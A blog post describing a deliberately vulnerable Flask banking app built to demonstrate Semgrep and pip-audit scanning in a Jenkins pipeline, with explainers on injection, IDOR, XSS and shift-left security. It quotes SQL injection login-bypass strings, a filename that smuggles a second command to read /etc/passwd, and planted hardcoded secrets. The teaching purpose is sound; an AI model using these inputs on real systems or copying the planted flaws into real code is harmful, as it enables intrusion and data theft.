How I Built a Deliberately Vulnerable Banking App to Demonstrate Automated Security Scanning with Semgrep and Jenkins
Most developers I've worked with believe their code is secure because their tests pass. I used to think the same. This post is about proving that belief wrong — with a working demo anyone can run themselves.
I built VulnBank: a deliberately vulnerable Flask banking application, wired up to a Jenkins CI/CD pipeline with Semgrep scanning at every stage. The goal was simple — show what automated security scanning actually looks like in practice, what it catches, and where its limits are.
The full project is available here: https://github.com/PrakyathReddy/VulnBank-Semgrep
THE CORE IDEA
Functional correctness and security correctness are not the same thing.
A banking app can transfer money correctly, authenticate users correctly, and render pages correctly — and still be completely compromised by an attacker in under five minutes.
The demo makes this concrete. Every unit test passes. The app works exactly as intended. And yet Semgrep finds four blocking vulnerabilities the moment it scans the code.
That moment — tests green, Semgrep red, pipeline blocked — is the entire point.
WHAT'S IN THE APP
VulnBank is a minimal Flask app with six features, each containing an intentional vulnerability:
SQL Injection — Login Page
The login form concatenates user input directly into a SQL query string. An attacker can enter the username:
admin'--
and bypass the password check entirely. The double-dash comments out the rest of the query. No password needed. Logged in as admin.
This is one of the oldest and most common vulnerabilities in web applications. It's also one of the easiest to fix — parameterized queries solve it completely. But under deadline pressure, developers reach for f-strings, and this is what happens.
IDOR — Account Viewer
After logging in, your account is at /account/1. If you change that number to /account/2, you see someone else's account. /account/3 shows another. There is no ownership check anywhere in the code — the app verifies you are logged in, but never verifies the account belongs to you.
This is an Insecure Direct Object Reference (IDOR). It's consistently in the OWASP Top 10 because it's so common and so easy to miss in code review.
Command Injection — File Upload
The file upload feature runs a shell command to inspect the uploaded file. The filename comes from the user and goes directly into that shell command with shell=True. An attacker uploads a file named:
photo.jpg; cat /etc/passwd
The shell executes both commands. The server's password file is returned.
Hardcoded Secrets
The Flask secret key, admin credentials, and AWS keys are all hardcoded directly in app.py:
app.secret_key = "supersecretkey123" ADMIN_PASSWORD = "admin123" AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
Anyone with repository access has these credentials. In a public repo, that means everyone.
Weak Cryptography — Password Reset
Password reset tokens are generated using MD5 of the username. MD5 is cryptographically broken. The token for any user is deterministic and precomputable. An attacker who knows your username can generate your reset token without ever interacting with the server.
Vulnerable Dependencies
requirements.txt pins requests to version 2.18.0, which carries multiple known CVEs including credential exposure via HTTP redirects. The app also pins an old version of Flask with a known advisory.
THE JENKINS PIPELINE
The pipeline has five stages. Each one builds on the last:
Stage 1 — Checkout Jenkins pulls the latest code from the GitHub repository. Nothing runs until the code is local.
Stage 2 — Install Sets up a Python virtual environment, installs application dependencies, and installs Semgrep and pip-audit.
Stage 3 — Semgrep SAST Runs Semgrep against the application code with --config auto. Semgrep loads rules appropriate for the detected language (Python/Flask) and scans every file. This is where SQL injection, command injection, and NaN injection are caught.
Stage 4 — Semgrep Secrets Runs Semgrep with the p/secrets ruleset against the entire repository. Designed to catch hardcoded API keys, tokens, and credentials.
Stage 5 — SCA with pip-audit Runs pip-audit against requirements.txt. This stage reads every pinned dependency, queries vulnerability databases, and reports every known CVE. This is where the 17 vulnerabilities across four packages surface.
Stage 6 — Security Gate Evaluates whether any prior stage failed. If anything failed, the gate blocks deployment with a clear message. The deploy stage never runs.
WHAT SEMGREP ACTUALLY FOUND
Running 128 rules across 17 files, Semgrep reported four blocking findings:
Finding 1: SQL Injection (Django rule) File: app.py, Line 113 User input concatenated directly into a raw SQL query string.
Finding 2: SQL Injection (Flask-specific rule) File: app.py, Line 113 Same line, flagged by a Flask-specific rule as well. Two different rule authors caught the same issue independently — which adds confidence.
Finding 3: NaN Injection File: app.py, Line 175 User input passed directly into float(). An attacker can pass the string "nan" which Python will cast to float NaN, causing undefined comparison behavior downstream. This one was not intentionally planted — Semgrep found it anyway.
Finding 4: subprocess with shell=True File: app.py, Line 228 subprocess.run called with shell=True and user-controlled input. The command injection vulnerability.
Scan summary: 4 findings, 4 blocking, 128 rules run, 17 files scanned.
The command injection was caught. The SQL injection was caught twice. A bonus vulnerability nobody planted was found. The pipeline failed. Deploy was blocked.
What Semgrep Did Not Catch
Hardcoded secrets - the generic strings like "supersecretkey123" and "admin123" did not match any pattern in the p/secrets ruleset. Semgrep's secrets rules are designed around recognisable formats: AWS key patterns that start with AKIA, GitHub tokens that start with ghp_, JWTs, private keys. A generic password assignment doesn't trigger them.
This is not a bug — it's a design decision. Flagging every string assignment would create overwhelming noise. But it means generic hardcoded credentials require either a paid tier with more rules, or custom rules written for your specific codebase.
IDOR was not caught either. IDOR is a logic flaw, not a code pattern. Semgrep can't know that your business rules require an ownership check on every account query — only you know that. This is exactly the use case for custom rules, which the project also includes.
SCA: WHERE THE REAL NOISE IS
pip-audit found 17 vulnerabilities across four packages: flask, requests, idna, and urllib3. This is what happens when you pin old dependency versions and never update them.
The requests package alone at version 2.18.0 carries four separate CVEs with fix versions ranging from 2.20.0 to 2.32.4. urllib3 at 1.21.1 carries sixteen vulnerabilities.
This is typical of real codebases. The application code might be relatively clean. The 99% of the codebase you didn't write — the dependencies — is often carrying years of unpatched vulnerabilities.
The SCA stage failed, which triggered the security gate, which blocked the deploy. This is the correct behavior.
THE SECURITY GATE
The security gate is the stage that makes everything meaningful. Without it, findings are advisory. Developers can see them, acknowledge them, and deploy anyway.
With a security gate:
Stage "Security gate" skipped due to earlier failure(s) SECURITY GATE FAILED — deployment blocked. Fix all findings before merging. Finished: FAILURE
The gate makes security non-negotiable. It enforces the shift-left philosophy not through culture or process, but through automation. Vulnerable code simply cannot reach production.
WHAT THIS DEMONSTRATES
After building and running this project end to end, a few things became very concrete:
Passing tests are not a security signal. All unit tests in the project pass. The app is functionally correct. The security failures are invisible to functional testing.
Speed matters. Semgrep scanned 17 files with 128 rules and returned results in seconds. A developer gets this feedback while they still have context about the code they just wrote.
Tools have limits. Semgrep missed the hardcoded secrets because they're generic strings. It missed the IDOR because it's a logic flaw. No tool catches everything. Understanding what a tool misses is as important as understanding what it catches.
Custom rules fill the gaps. The project includes custom Semgrep rules for IDOR detection and Flask-specific secret patterns. These are rules no public ruleset would ever have — because they're specific to this codebase's patterns. This is where the real depth of Semgrep becomes apparent.
SCA is often noisier than SAST. Four packages, seventeen vulnerabilities. Most of them are in transitive dependencies — packages you didn't choose, pulled in by packages you did choose. Managing this noise, distinguishing reachable from unreachable vulnerabilities, is where SCA tooling is still maturing.
CONCEPTS EXPLAINED
If some of the terminology in this post was unfamiliar, here is a plain-language breakdown of the key concepts behind what Semgrep does and why it works.
SAST — Static Application Security Testing
SAST analyses source code without executing the program. It reads your code as a structure and looks for patterns that indicate vulnerabilities — both known ones and potential ones.
The attacks SAST catches are a specific class: ones that do not require modifying source code at all. They come entirely through inputs the app itself asks for. A customer with malicious intent provides something unexpected, and the app handles it unsafely.
SQL Injection is the classic example. When an app asks for your name to look up your account, most users type their name. A malicious user types something like ' OR '1'='1' -- instead. The app takes that input and builds a SQL query from it. The attacker's input breaks out of the data context and becomes part of the query itself — extending it, modifying it, or bypassing it entirely. The impact ranges from reading data that should be private to corrupting the database to executing OS commands on the server. The fix is simple in principle: never treat input as an instruction. Use parameterized queries — curly-brace placeholders — which make it structurally impossible for input to escape the data context and become part of the command.
Command Injection works the same way at the OS level. The app accepts input and passes it to a shell command. A malicious user appends a semicolon and a second command. The shell runs both. The attacker now has the ability to run arbitrary commands on the backend server — delete files, exfiltrate data, install backdoors. The fix is to never pass user input directly to a shell. Use subprocess with a list of arguments and shell=False. Each argument is treated as a whole string and never parsed by the shell.
XSS — Cross Site Scripting — operates at the browser level rather than the server. When you log into a website, your browser downloads and executes that site's JavaScript. The site also gives you a cookie — a small token that identifies you so you don't have to log in on every page. JavaScript running on a page has access to those cookies, your session data, local storage, and the entire page content. If an attacker can inject a malicious script into a page — through an input field that isn't sanitized — your browser pulls that script down along with the legitimate code and executes it. The attacker's script can forward your cookies to their own server, log every keystroke, replace the entire page with a fake login form, or make network requests using your identity. The fix is to always treat user input as text, never as HTML. Before rendering any user-provided content back into a page, escape all HTML characters. The second line of defence is a Content Security Policy header — even if a script somehow gets in, the CSP header tells the browser only to execute scripts from verified, authorised sources.
How SAST Works Internally
To do any of this, SAST tools need to actually understand code rather than just search text. The pipeline looks like this:
Source code is parsed into an AST — an Abstract Syntax Tree. This is the source code broken apart into a tree of operators, assignments, function calls, and conditions that the tool can reason about structurally. Unlike raw text search, the AST represents what the code means, not just what it says.
Control flow analysis maps all the paths the code can take — branches, loops, function calls. Code rarely runs straight from top to bottom. It splits based on conditions, repeats in loops, jumps to functions and returns. SAST builds a map of every possible execution path.
Taint tracking then follows untrusted data — input from a user — along every one of those paths. The data enters at a source (a form field, a URL parameter, a cookie). The tool traces every variable it touches, every function it passes through, every transformation applied to it. If it reaches a sink — a database query, a shell command, a rendered HTML page — without being sanitized first, that path is a vulnerability. The finding is reported with the exact file and line number where the taint reaches the sink.
SCA — Software Composition Analysis
Modern applications are mostly code other people wrote. Your dependencies — the packages in requirements.txt, package.json, pom.xml — can easily represent 99% of what's actually running. SCA is focused entirely on that layer.
SCA reads your manifest files, resolves the full dependency tree including transitive dependencies (packages your packages depend on), and checks every package and version against large databases of known vulnerabilities. Each known vulnerability has a CVE identifier, a severity score, affected versions, and a fixed version.
SCA tools also check license types across the dependency tree — a GPL-licensed package in a commercial product can create legal exposure that has nothing to do with security. And SCA tools generate SBOMs — Software Bills of Materials — a machine-readable inventory of every component in your software with its version, license, and source. When a critical CVE drops, an SBOM lets you query instantly whether your product is affected, rather than manually checking every codebase.
Secrets Scanning
Credentials, API keys, tokens, and private keys accidentally committed to source code are one of the most common causes of breaches. Secrets scanning detects these by pattern matching against known formats — AWS keys follow a specific pattern, GitHub tokens have a recognisable prefix, private keys have a standard header — and by entropy analysis, flagging strings that are long and random-looking enough to be a real credential.
The limitation, as this project discovered firsthand, is that generic strings like "admin123" or "supersecretkey123" don't match known patterns and have low entropy. They require custom rules written for your specific codebase.
Shift-Left
The software delivery lifecycle runs roughly: Design, Code, Build, Test, Staging, Release, Production. Traditionally, security checkpoints lived near the right end of that line — pre-production reviews, penetration testing before release, security audits on finished software.
The shift-left philosophy moves security as far left as possible — ideally to the moment a developer writes the code. The reasoning is economic as much as technical: a vulnerability caught while the developer is still writing the code takes minutes to fix. The same vulnerability caught in a pre-production audit takes days. Caught in production after an incident, it can take weeks and cost significantly more in remediation, reputation, and regulatory exposure.
Semgrep is built for the left side of that line. It runs in seconds, integrates into CI/CD pipelines, and surfaces findings as inline comments on pull requests while the developer still has context. Checkmarx, by contrast, is built more toward the middle and right — deep comprehensive scans run nightly or weekly, reviewed by dedicated security teams, used for compliance reporting and formal sign-off.
Neither replaces the other. Semgrep catches the majority of issues fast and cheaply. Deeper tools catch the subtle cross-file flows and complex logic that fast scanners miss. A mature security program uses both.
IDOR — Insecure Direct Object Reference
Think of it this way: you are authorised to borrow a book from the library. But the librarian doesn't check which book — they just let you in. You can now take any book, or all of them.
In web applications, this means the app checks that you are logged in but never checks whether the specific resource you are requesting belongs to you. Your account is at /account/1. An attacker changes the URL to /account/2 and sees someone else's account. The app authenticated the user correctly. It never authorised which data that user is allowed to see. The fix is a single additional condition in the database query — fetch this account only if it belongs to the currently authenticated user.
RUNNING IT YOURSELF
Everything is in the repository. You need Docker, Python 3, and a free Semgrep account.
git clone https://github.com/PrakyathReddy/VulnBank-Semgrep cd VulnBank-Semgrep pip install -r requirements.txt python app.py
The app runs on localhost:5000. Demo credentials are in the README.
For the Jenkins pipeline, the README includes the exact Docker commands to get Jenkins running and connected to the repo.
Full project: https://github.com/PrakyathReddy/VulnBank-Semgrep
CLOSING THOUGHT
Security tooling only works if developers trust it and act on it. A tool that takes two hours to scan and produces eight hundred findings will be ignored. A tool that takes thirty seconds, produces four precise findings with line numbers and fix suggestions, and blocks the build — that gets fixed.
The shift-left movement is not really about tools. It is about putting security feedback at the moment when a developer can most easily act on it: while they are still thinking about that code, before the PR is merged, before the deploy happens.
VulnBank makes that concrete. The code is bad, the tests pass, the pipeline catches it, the deploy is blocked. That sequence — visible, automated, fast — is what good security tooling looks like in practice.